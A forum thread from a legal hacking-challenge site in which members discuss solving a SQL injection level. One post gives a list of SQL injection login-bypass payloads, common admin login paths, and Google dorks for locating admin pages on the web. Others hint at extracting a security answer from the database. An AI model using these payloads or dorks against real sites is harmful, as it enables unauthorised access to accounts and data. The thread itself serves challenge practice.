ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2012-04-12 10:41:43

dariusmare
Member
Registered: 2012-03-20
Posts: 40

SQL 2

Please some help with SQL 2. I can logging as us3r but i can''t login as administrator. Some help please.


If i helped you please press the Thanks Button under my Profile Actually press (look left)

Offline

#2 2012-04-12 14:10:07

orion
Member
Registered: 2012-03-19
Posts: 57

Re: SQL 2

us3r i think is the admin just login as us3r and refresh


wHeNInDOubTrOllOUt!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!biggrin

Offline

#3 2012-04-12 23:25:48

dariusmare
Member
Registered: 2012-03-20
Posts: 40

Re: SQL 2

I entered as admin but there is another protection: a security question. I tried:
security' or 1=1--
security' or a=a--
security:' or 1=1--
security or 1=1--
security or a=a=--
answer' or 1=1--
answer' or a=a--
answer:' or 1=1-
answer or 1=1--
and another like this but no result.


If i helped you please press the Thanks Button under my Profile Actually press (look left)

Offline

#4 2012-04-13 01:56:47

orion
Member
Registered: 2012-03-19
Posts: 57

Re: SQL 2

I haven't completed but it is supposed to all happen through login box


wHeNInDOubTrOllOUt!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!biggrin

Offline

#5 2012-05-24 02:41:22

plummerblue
Member
Registered: 2012-04-24
Posts: 20

Re: SQL 2

Is this for the realistic challenge 2? im having problems with this too. Im just not sure where to look for information.

Offline

#6 2012-07-28 14:19:36

ledge16
Member
Registered: 2012-06-07
Posts: 3

Re: SQL 2

It's just like SQL challenge 1, you first pass the login thing, use these:
[spoiler]
ASP SQL Injection for Admin login page

Admin login page:
Code:
admin/login.asp
admin/
login.asp
admin.asp


Dork for find admin area:
Code:
inurl:login.asp
index of:/admin/login.asp

i used this code :- ' or '1'='1


Injection type:
Code:
user:admin (what ever you want)
pass:' or 1=1--


Code:
user:' or 1=1--
admin:' or 1=1--


Others:

Code:
'
'or''='
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
[/spoiler]
After that i dont know how to pass the security questions!

Offline

#7 2013-07-29 09:42:39

Firescar
Member
Registered: 2013-07-29
Posts: 2

Re: SQL 2

admin is the admin, not usr3

Offline

#8 2013-11-09 14:50:32

sharsil
Member
Registered: 2013-11-09
Posts: 2

Re: SQL 2

error   Secret answer doesn't match answer in security table


Logged in as admin  Log Out


error   Due to some unexplained break-ins recently to this site, we have added an extra feature to prove you are the owner of this account.



Security Question: mothers maiden name


Answer:

and what can i do?)

Offline

#9 2013-11-11 00:52:47

Backbite
Member
Registered: 2013-04-26
Posts: 66

Re: SQL 2

That meaning you can get name table

Offline

#10 2013-11-11 00:54:28

Backbite
Member
Registered: 2013-04-26
Posts: 66

Re: SQL 2

and you try to query for find answer of admin's secure question

Tutorial can help you.

Offline

#11 2013-11-13 01:23:51

Backbite
Member
Registered: 2013-04-26
Posts: 66

Re: SQL 2

if you can't PM to me for more hint.

Offline

Board footer

Powered by FluxBB